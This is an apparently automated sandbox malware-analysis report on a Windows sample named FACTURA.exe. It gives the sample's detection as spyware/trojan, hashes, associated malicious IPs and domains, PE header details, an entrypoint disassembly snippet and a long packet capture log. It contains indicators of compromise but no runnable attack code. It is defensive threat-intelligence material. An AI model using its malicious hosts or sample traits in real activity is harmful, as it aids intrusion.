                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.spre.troj.spyw.evad.winEXE@6/1@4/3
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 80
                                    • Number of non-executed functions: 23
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.54.122.82, 51.105.236.244, 20.50.102.62, 92.123.194.20, 92.123.194.82, 8.248.149.254, 8.253.95.249, 67.26.81.254, 8.248.113.254, 67.27.157.254, 20.82.210.154, 8.253.95.121, 67.27.157.126, 8.248.145.254, 8.248.137.254, 20.82.209.183, 67.26.137.254, 67.27.158.254, 8.248.119.254
                                    • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, wd-prod-cp.trafficmanager.net, arc.msn.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    18:04:04API Interceptor2610x Sleep call for process: RegAsm.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    109.169.39.245FACTURA.exeGet hashmaliciousBrowse
                                      Faktura 900011706 - 2476.exeGet hashmaliciousBrowse
                                        Zapytanie ofertowe (SMAY-300921).exeGet hashmaliciousBrowse
                                          FACTURA.exeGet hashmaliciousBrowse
                                            Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeGet hashmaliciousBrowse
                                              FACTURA.exeGet hashmaliciousBrowse
                                                LISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                                  Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                                    BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                                      BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                                        Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          edge-web.dual-gslb.spotify.comSwift Copy.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          Justificante de la transfer.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          Sipari#U015f-05.10..2021.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          justificante de la transfer.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          udI2NcR8Lj.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          bthGMpTA2L.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          MT103_SWIFT.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          EVLb7JeDaK.dllGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          Struggleres5.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          Pago de factura.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          payment confirmation.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          Unreal.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          hVlpEajflR.exeGet hashmaliciousBrowse
                                                          • 35.186.224.25
                                                          mail.reyesyasociados.comFACTURA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Faktura 900011706 - 2476.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Zapytanie ofertowe (SMAY-300921).exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          FACTURA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          FACTURA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          LISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                                          • 109.169.39.245

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          IOMART-ASGBtw5UWfYw0b.exeGet hashmaliciousBrowse
                                                          • 62.233.121.61
                                                          v3YfBIj.HtMLGet hashmaliciousBrowse
                                                          • 5.152.205.141
                                                          SB883681QI.xlsxGet hashmaliciousBrowse
                                                          • 31.3.244.76
                                                          FACTURA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Faktura 900011706 - 2476.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          H9pNgz5hYJGet hashmaliciousBrowse
                                                          • 212.38.173.97
                                                          Zapytanie ofertowe (SMAY-300921).exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          FACTURA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          FACTURA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          LISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          4czqYWTUq8Get hashmaliciousBrowse
                                                          • 217.147.86.101
                                                          b8uTZxALDhGet hashmaliciousBrowse
                                                          • 176.56.205.97
                                                          XMae11M5ygGet hashmaliciousBrowse
                                                          • 109.75.167.7
                                                          BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          shinto.x86Get hashmaliciousBrowse
                                                          • 217.194.212.165
                                                          BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                                          • 109.169.39.245
                                                          QkAgFhbO4a.exeGet hashmaliciousBrowse
                                                          • 109.169.33.163

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19NK0976543456789.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          chris.cooper-payroll712.htmGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          just.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          cs.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          TC.pptGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          SOA.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          QUOTATION.pptGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          SHIPPING 4500 mts WRIC - Tunisia N.Spain.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          ZB7cxCweYR.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          VC-Q-1056410-21GR1.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          irS2MnWkHX.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          PueX8JFkOF.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          u6Yj1SceIA.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          bapLzMledg.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          uV3s4GmCEl.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          3ETIvVHfMR.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          PILhwYPx4r.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          SBTH (10.04.2021).xlsx.vbsGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          GetFormsOnline.7e68211f2f3e474f9e64e8df9a786dd0.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65
                                                          justificante.exeGet hashmaliciousBrowse
                                                          • 172.217.18.110
                                                          • 142.250.185.65

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          \Device\ConDrv
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):3.964735178725505
                                                          Encrypted:false
                                                          SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                          MD5:9F754B47B351EF0FC32527B541420595
                                                          SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                          SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                          SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: NordVPN directory not found!..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):5.836178671279151
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:FACTURA.exe
                                                          File size:102400
                                                          MD5:5086ecea441041d6101cf29faf76659d
                                                          SHA1:2250015bcfd5a875c838606e75aae8691990557f
                                                          SHA256:cdae2d1f513980104d3b0e65fdf8bb7afe27ec1e2c37cd6fdd638a71dc7cf91d
                                                          SHA512:67c6b4246ac4a3a7afdac152791eb2dc9212e87d45cb68a2e64f1ae6679a4f96f7af8b5b09599832e2d27b3c412f61a61df61fc8d0e51a5d2050b577760c95d9
                                                          SSDEEP:768:txBJpk2lUQYg4wxMrQmpIzBm2DKKL5A1Iloq0/jyJ9GKzEj7D+1fbAU/MzwhH1V+:tXEk92Q3H5ajhjyJNU7St8U/jvEd5d
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L....!aW.................`... ...............p....@........

                                                          File Icon

                                                          Icon Hash:01eefc79b2b0b2b0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x401500
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                          DLL Characteristics:
                                                          Time Stamp:0x57612100 [Wed Jun 15 09:33:52 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:64e4aee665feef1b106b6eccf2b2e39f

                                                          Entrypoint Preview

                                                          Instruction
                                                          push 0041038Ch
                                                          call 00007F0CB0B97A03h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          xor byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          inc eax
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edi-6C7BE1E5h], ch
                                                          cmpsb
                                                          das
                                                          dec ebx
                                                          mov ah, 98h
                                                          or dword ptr [edx-63h], ebx
                                                          push eax
                                                          insd
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          push eax
                                                          dec ecx
                                                          and byte ptr [ebx+41h], al
                                                          dec esp
                                                          dec ebp
                                                          inc ebp
                                                          dec esp
                                                          dec esp
                                                          inc ebp
                                                          dec ebp
                                                          push ebx
                                                          push esp
                                                          inc ecx
                                                          dec esi
                                                          inc esp
                                                          push ebx
                                                          add byte ptr [ebp+74h], ah
                                                          push eax
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          dec esp
                                                          xor dword ptr [eax], eax
                                                          cmp byte ptr [7C333EF0h], bh
                                                          push ebx
                                                          pop ds
                                                          inc ebx
                                                          stosd
                                                          jnle 00007F0CB0B979F0h
                                                          pop edx
                                                          adc al, byte ptr [ebp-39h]
                                                          sub ch, byte ptr [esi+edx*2+33h]

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x160b40x28.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000xa18.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x138.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x155b00x16000False0.490556196733data6.24037640244IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .data0x170000xcf80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x180000xa180x1000False0.155517578125data2.50021066399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x184b00x568GLS_BINARY_LSB_FIRST
                                                          RT_GROUP_ICON0x1849c0x14data
                                                          RT_VERSION0x180f00x3acdataChineseTaiwan

                                                          Imports

                                                          DLLImport
                                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0404 0x04b0
                                                          LegalCopyright(c) EZB Systems, Inc.
                                                          InternalNameTurnera7
                                                          FileVersion4.04.0001
                                                          CompanyName(c) EZB Systems, Inc.
                                                          LegalTrademarks(c) EZB Systems, Inc.
                                                          Comments(c) EZB Systems, Inc.
                                                          ProductName(c) EZB Systems, Inc.
                                                          ProductVersion4.04.0001
                                                          FileDescription(c) EZB Systems, Inc.
                                                          OriginalFilenameTurnera7.exe

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          ChineseTaiwan

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 6, 2021 18:03:53.665517092 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.665606976 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:53.665854931 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.685795069 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.685874939 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:53.737674952 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:53.737914085 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.739743948 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:53.739948034 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.868180037 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.868191957 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:53.868335009 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:53.868535042 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.872540951 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:53.913887978 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:54.278671980 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:54.278708935 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:54.278783083 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:54.278831005 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:54.279007912 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:54.284109116 CEST49787443192.168.11.20172.217.18.110
                                                          Oct 6, 2021 18:03:54.284125090 CEST44349787172.217.18.110192.168.11.20
                                                          Oct 6, 2021 18:03:54.352842093 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.352855921 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.352994919 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.353317022 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.353322983 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.385051966 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.385179996 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.385226965 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.385229111 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.385699987 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.385848999 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.385854959 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.400182962 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.400408983 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.400589943 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.401045084 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.442025900 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.611951113 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.612160921 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.612396955 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.612629890 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.612999916 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.613234043 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.614358902 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.614483118 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.614659071 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.614710093 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.614720106 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.614932060 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.614965916 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.615187883 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.615233898 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.615463972 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.621433973 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.621622086 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.621654987 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.621798038 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.621824980 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.621864080 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.622088909 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.622400999 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.622622013 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.622668982 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.622864008 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.623083115 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.623300076 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.623346090 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.623538017 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.623763084 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.623959064 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.624005079 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.624205112 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.624423981 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.624579906 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.624614954 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.624840975 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.625062943 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.625217915 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.625252962 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.625474930 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.625741005 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.625895977 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.625929117 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.626116991 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.626384974 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.626548052 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.626585007 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.626773119 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.626992941 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.627145052 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.627173901 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.627403975 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.627451897 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.627645969 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.627909899 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.628062963 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.628092051 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.628108978 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.628271103 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.628304005 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.628495932 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.628730059 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.628881931 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.628911018 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.629080057 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.629110098 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.629338026 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.629570007 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.629719973 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.629731894 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.629757881 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.629883051 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.629909039 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.631248951 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.631393909 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.631412029 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.631434917 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.631525993 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.631541967 CEST49789443192.168.11.20142.250.185.65
                                                          Oct 6, 2021 18:03:54.631572008 CEST44349789142.250.185.65192.168.11.20
                                                          Oct 6, 2021 18:03:54.631714106 CEST49789443192.168.11.20142.250.185.65
